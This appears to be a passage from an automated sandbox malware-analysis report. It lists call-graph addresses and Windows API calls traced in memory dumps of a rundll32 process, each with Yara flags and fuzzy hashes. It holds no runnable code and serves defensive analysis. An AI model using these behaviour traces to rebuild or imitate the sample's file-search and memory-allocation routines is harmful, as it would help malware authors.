41005c 84687->84688 84689 40b730 10 API calls 84688->84689 84690 41011f 84689->84690 84690->84474 84691->84474 84692->84668 84694 40fab9 84693->84694 84695 413e50 LdrLoadDll 84694->84695 84696 40faf0 84695->84696 84697 413e50 LdrLoadDll 84696->84697 84698 40fb08 84697->84698 84699 413e50 LdrLoadDll 84698->84699 84701 40fb24 84699->84701 84700 40fbac 84700->84492 84701->84700 84702 40fb4e FindFirstFileW 84701->84702 84702->84700 84703 40fb69 84702->84703 84704 40fb93 FindNextFileW 84703->84704 84707 40f970 11 API calls 84703->84707 84704->84703 84706 40fba5 FindClose 84704->84706 84706->84700 84707->84703 84708->84538 84710 409e90 LdrLoadDll 84709->84710 84711 410146 84710->84711 84712 41015a 84711->84712 84713 409e90 LdrLoadDll 84711->84713 84714 409e90 LdrLoadDll 84712->84714 84713->84712 84715 410174 84714->84715 84716 413a50 8 API calls 84715->84716 84717 410188 84715->84717 84716->84717 84717->84543 84719 40d600 84718->84719 84725 40d715 84718->84725 84720 413a50 8 API calls 84719->84720 84721 40d618 84720->84721 84722 413a50 8 API calls 84721->84722 84721->84725 84723 40d648 84722->84723 84724 41a0a0 2 API calls 84723->84724 84723->84725 84724->84725 84725->84542 84727 40dd75 84726->84727 84728 413e50 LdrLoadDll 84727->84728 84729 40ddc0 84728->84729 84730 40e11f 84729->84730 84731 413a50 8 API calls 84729->84731 84730->84272 84732 40dddc 84731->84732 84732->84730 84733 418960 2 API calls 84732->84733 84734 40de12 84733->84734 84735 40e107 84734->84735 84737 41b380 3 API calls 84734->84737 84736 41a0a0 2 API calls 84735->84736 84736->84730 84738 40de31 84737->84738 84738->84735 84739 40df27 84738->84739 84740 418180 2 API calls 84738->84740 84777 40aba0 LdrLoadDll LdrInitializeThunk 84739->84777 84741 40deb1 84740->84741 84741->84739 84743 40deb9 84741->84743 84747 40aa90 2 API calls 84743->84747 84751 40dedc 84743->84751 84758 40df0d 84743->84758 84744 40df52 84744->84735 84746 40df87 84744->84746 84750 40aa90 2 API calls 84744->84750 84745 41a0a0 2 API calls 84749 40df1d 84745->84749 84778 40a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 84746->84778 84747->84751 84748 418710 2 API calls 84753 40deec 84748->84753 84749->84272 84750->84746 84751->84748 84755 4175b0 2 API calls 84753->84755 84754 40dfa9 84756 40e0e6 84754->84756 84757 40dfb7 84754->84757 84755->84758 84760 41a0a0 2 API calls 84756->84760 84779 418780 LdrLoadDll 84757->84779 84758->84745 84761 40e0fd 84760->84761 84761->84272 84762 40dfd6 84763 40d200 3 API calls 84762->84763 84764 40e03b 84763->84764 84764->84735 84765 40e046 84764->84765 84766 41a0a0 2 API calls 84765->84766 84767 40e06a 84766->84767 84780 4182e0 LdrLoadDll 84767->84780 84769 40e07e 84770 418290 2 API calls 84769->84770 84771 40e0a5 84770->84771 84772 40e0ac 84771->84772 84781 4182e0 LdrLoadDll 84771->84781 84772->84272 84774 40e0ce 84782 4180a0 LdrLoadDll 84774->84782 84776 40e0dc 84776->84272 84777->84744 84778->84754 84779->84762 84780->84769 84781->84774 84782->84776 84784 40b59c 84783->84784 84785 40b400 2 API calls 84784->84785 84786 40b5e6 84785->84786 84787 40b688 84786->84787 84788 418420 2 API calls 84786->84788 84787->84281 84791 40b60d 84788->84791 84789 40b67f 84790 418710 2 API calls 84789->84790 84790->84787 84791->84789 84792 40b694 84791->84792 84793 418420 2 API calls 84791->84793 84794 418710 2 API calls 84792->84794 84793->84791 84795 40b69d 84794->84795 84796 40b70c 84795->84796 84797 40b400 2 API calls 84795->84797 84796->84281 84798 40b6b6 84797->84798 84798->84796 84799 413e50 LdrLoadDll 84798->84799 84799->84796

                                                                                                                          Executed Functions

                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040FB5F
                                                                                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0040FB9E
                                                                                                                          • FindClose.KERNEL32(?), ref: 0040FBA9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 6ee087180711228f804c369dc05dcf42940a756ace635dcca91050d0c6f1f568
                                                                                                                          • Instruction ID: 0b798dc4eab1c55350c0cb67db25907102412528e9f03401b13478227c200f42
                                                                                                                          • Opcode Fuzzy Hash: 6ee087180711228f804c369dc05dcf42940a756ace635dcca91050d0c6f1f568
                                                                                                                          • Instruction Fuzzy Hash: EE319471900308BBDB20DF65CC85FEB777CAF44704F14456DB949A71C1D674AA848B95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040FB5F
                                                                                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0040FB9E
                                                                                                                          • FindClose.KERNEL32(?), ref: 0040FBA9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
                                                                                                                          • Instruction ID: 770f6d6fafb9d5f45b31999cc79e7e80c23310b70e2b12f41f36733285219747
                                                                                                                          • Opcode Fuzzy Hash: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
                                                                                                                          • Instruction Fuzzy Hash: 7531A471900308BBDB30DF65CC85FEB777CAF84704F14446EB909A71C1D678AA888BA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00413BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00413BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0041862D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                          • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                                                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                          • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:A,FFFFFFFF,?,r=A,?,00000000), ref: 004186D5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: 1:A
                                                                                                                          • API String ID: 2738559852-4271569354
                                                                                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                          • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                                                                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                          • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:A,FFFFFFFF,?,r=A,?,00000000), ref: 004186D5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: 1:A
                                                                                                                          • API String ID: 2738559852-4271569354
                                                                                                                          • Opcode ID: 894451518b03425b5f96cb665bb015821518830248b6bef362a5c2ab4153df95
                                                                                                                          • Instruction ID: 953023158cc98f1c8196bf5573ae22161c72cbad5555432729f78a93f1a2237a
                                                                                                                          • Opcode Fuzzy Hash: 894451518b03425b5f96cb665bb015821518830248b6bef362a5c2ab4153df95
                                                                                                                          • Instruction Fuzzy Hash: CCF017B6204049ABCB04DF99D890CEB77ADBF8C354B15828DFA1CA7201C630E855CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(P=A,?,?,00413D50,00000000,FFFFFFFF), ref: 00418735
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID: P=A
                                                                                                                          • API String ID: 3535843008-4174302746
                                                                                                                          • Opcode ID: 018cb176b172d783d48d9f0d354cb53a4ba3811f890f0fcac36f657c00b585a6
                                                                                                                          • Instruction ID: 525f99c71dfe225296bb4ca44611c08f383b6dbc49112883f63eb832c7279ea7
                                                                                                                          • Opcode Fuzzy Hash: 018cb176b172d783d48d9f0d354cb53a4ba3811f890f0fcac36f657c00b585a6
                                                                                                                          • Instruction Fuzzy Hash: 94E04631600214ABDB20DFA4CC86EEB7B6AEF44360F144159F909DB682C630E650CAD0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(P=A,?,?,00413D50,00000000,FFFFFFFF), ref: 00418735
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID: P=A
                                                                                                                          • API String ID: 3535843008-4174302746
                                                                                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                          • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                                                                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                          • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 004187F9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                          • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                                                                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                          • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 004187F9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          • Opcode ID: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
                                                                                                                          • Instruction ID: f6e690475ae93a959fdc8485af364064d5dcee13894a993032aafcde413755c4
                                                                                                                          • Opcode Fuzzy Hash: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
                                                                                                                          • Instruction Fuzzy Hash: 42F015B2200109AFDB14DF89CC80EEB77A9AF88354F118249FA0897241C630E911CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: c7cea9bf9d13d13d40e276952908a61dccacdb37d31b8f7d03de8831793b13e5
                                                                                                                          • Instruction ID: eeb5e1e240dedd339afb36159c138cda536267c82482f5aa3a6d6576b836ee0b
                                                                                                                          • Opcode Fuzzy Hash: c7cea9bf9d13d13d40e276952908a61dccacdb37d31b8f7d03de8831793b13e5
                                                                                                                          • Instruction Fuzzy Hash: 2E90023560610403F50471584614786100987D0245F61E815A1C195A8DC7A5D95175E2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 3e4470072fc24e9b1424e040b20ce4f863a7b964befae4fa221cff3518281c0a
                                                                                                                          • Instruction ID: 2b89149a4803b5fb4f80e11f3d21ad19ea6570b1bcd417ae43cd50de832a25b0
                                                                                                                          • Opcode Fuzzy Hash: 3e4470072fc24e9b1424e040b20ce4f863a7b964befae4fa221cff3518281c0a
                                                                                                                          • Instruction Fuzzy Hash: 1390022D21300003F5847158550878A000987D1246F91F819A180A598CC925D8696361
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 20602f1040717672a303748b4210c1da5ddf94446677db792630b29699340ba2
                                                                                                                          • Instruction ID: 34809b09234aab08af3bc5439d87b485b94d9ddfe9c0864cf7bc4f1817b50e74
                                                                                                                          • Opcode Fuzzy Hash: 20602f1040717672a303748b4210c1da5ddf94446677db792630b29699340ba2
                                                                                                                          • Instruction Fuzzy Hash: 3C900225243041537949B1584504687400A97E0285791E416A2C09990CC536E856E661
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 33e4917bb3c8d13b70d674bb67b18bf16df453058a81d2f74556909c909988e3
                                                                                                                          • Instruction ID: faf9a378fb07e6a849d85db2a0c5215f92fcc35715f48b6bc9e2e6fe1a7e9e30
                                                                                                                          • Opcode Fuzzy Hash: 33e4917bb3c8d13b70d674bb67b18bf16df453058a81d2f74556909c909988e3
                                                                                                                          • Instruction Fuzzy Hash: 0290023520200413F51571584604787000D87D0285F91E816A1C19598DD666D952B161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 5a8e214b5c585a5b298db4f4a3d20f3df6db2b03c455f568094c6f9f6166438f
                                                                                                                          • Instruction ID: ff209d3034794d5507eb559da6b850f9e500dca11f6737f76f34a55d87fc6ed1
                                                                                                                          • Opcode Fuzzy Hash: 5a8e214b5c585a5b298db4f4a3d20f3df6db2b03c455f568094c6f9f6166438f
                                                                                                                          • Instruction Fuzzy Hash: B790027520200403F544715845047C6000987D0345F51E415A6859594EC669DDD576A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 0995ac71957f608619e47b8d481254b2004b09d111fbf5d2e95a2d6b42dbe76e
                                                                                                                          • Instruction ID: be3f0c5e5fdd6210d7e0c6b8dc999d79235f332343313620a93d324654ae543f
                                                                                                                          • Opcode Fuzzy Hash: 0995ac71957f608619e47b8d481254b2004b09d111fbf5d2e95a2d6b42dbe76e
                                                                                                                          • Instruction Fuzzy Hash: 4090026534200443F50471584514B860009C7E1345F51E419E2859594DC629DC527166
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 30cebfca397f929345762a00c5676f63e90f1fd84436695ce62c71bbc5612f19
                                                                                                                          • Instruction ID: e622ef3787fe945459d44366769b1d24d6404bca288892d341e8117849b9dcb0
                                                                                                                          • Opcode Fuzzy Hash: 30cebfca397f929345762a00c5676f63e90f1fd84436695ce62c71bbc5612f19
                                                                                                                          • Instruction Fuzzy Hash: 8090022521280043F60475684D14B87000987D0347F51E519A1949594CC925D8616561
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 71fdde7b3ca5c7a58c47abf2421626d285f65b5bb04bb23401c0d7ecac8ef4b1
                                                                                                                          • Instruction ID: 75340327b335087e31e56ee9c0325c38f0cb90b8c22fe3e23279cd3c245ba9c6
                                                                                                                          • Opcode Fuzzy Hash: 71fdde7b3ca5c7a58c47abf2421626d285f65b5bb04bb23401c0d7ecac8ef4b1
                                                                                                                          • Instruction Fuzzy Hash: DC90022524200803F54471588514787000AC7D0645F51E415A1819594DC626D96576F1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 85036e4a2cd11f4b2328ae5da89d5d239aa57ace44dad765e3686742d30c30ac
                                                                                                                          • Instruction ID: 0a8840e33a242e2697c9a975fbd78968cbdda95e105ebf61a558599706947e59
                                                                                                                          • Opcode Fuzzy Hash: 85036e4a2cd11f4b2328ae5da89d5d239aa57ace44dad765e3686742d30c30ac
                                                                                                                          • Instruction Fuzzy Hash: 4D900229212000032509B5580704687004A87D5395351E425F280A590CD631D8616161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: f0a7d74872905c194c4590d62d46a4f0394c0a60cb0f96f8ab3549b9c6dbba04
                                                                                                                          • Instruction ID: ae8c6cfa1c8567b5cfa04f28adfbb6255c35385f8d85fa71dcae17b3044cfdb3
                                                                                                                          • Opcode Fuzzy Hash: f0a7d74872905c194c4590d62d46a4f0394c0a60cb0f96f8ab3549b9c6dbba04
                                                                                                                          • Instruction Fuzzy Hash: 5190026520300003650971584514796400E87E0245B51E425E28095D0DC535D8917165
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 6124f23a5fef839d03090145a425e570fc49a6b1b074ad0ff3d191e240efcc08
                                                                                                                          • Instruction ID: 9b429295374de5249bbe73c1c767c60c57e458baf471df2ee84d51428cdee383
                                                                                                                          • Opcode Fuzzy Hash: 6124f23a5fef839d03090145a425e570fc49a6b1b074ad0ff3d191e240efcc08
                                                                                                                          • Instruction Fuzzy Hash: D290023560600803F554715845147C6000987D0345F51E415A1819694DC765DA5576E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: ee35dc5f731832f89375b2557f28afafa21a8dd9dd4c321dbeebe516c5c44b0c
                                                                                                                          • Instruction ID: bcc6cc61b7cf4d5f67daf55dd2ce79891b508d9689ceab529f45f17b13480c9c
                                                                                                                          • Opcode Fuzzy Hash: ee35dc5f731832f89375b2557f28afafa21a8dd9dd4c321dbeebe516c5c44b0c
                                                                                                                          • Instruction Fuzzy Hash: 0990023520200803F584715845047CA000987D1345F91E419A181A694DCA25DA5977E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
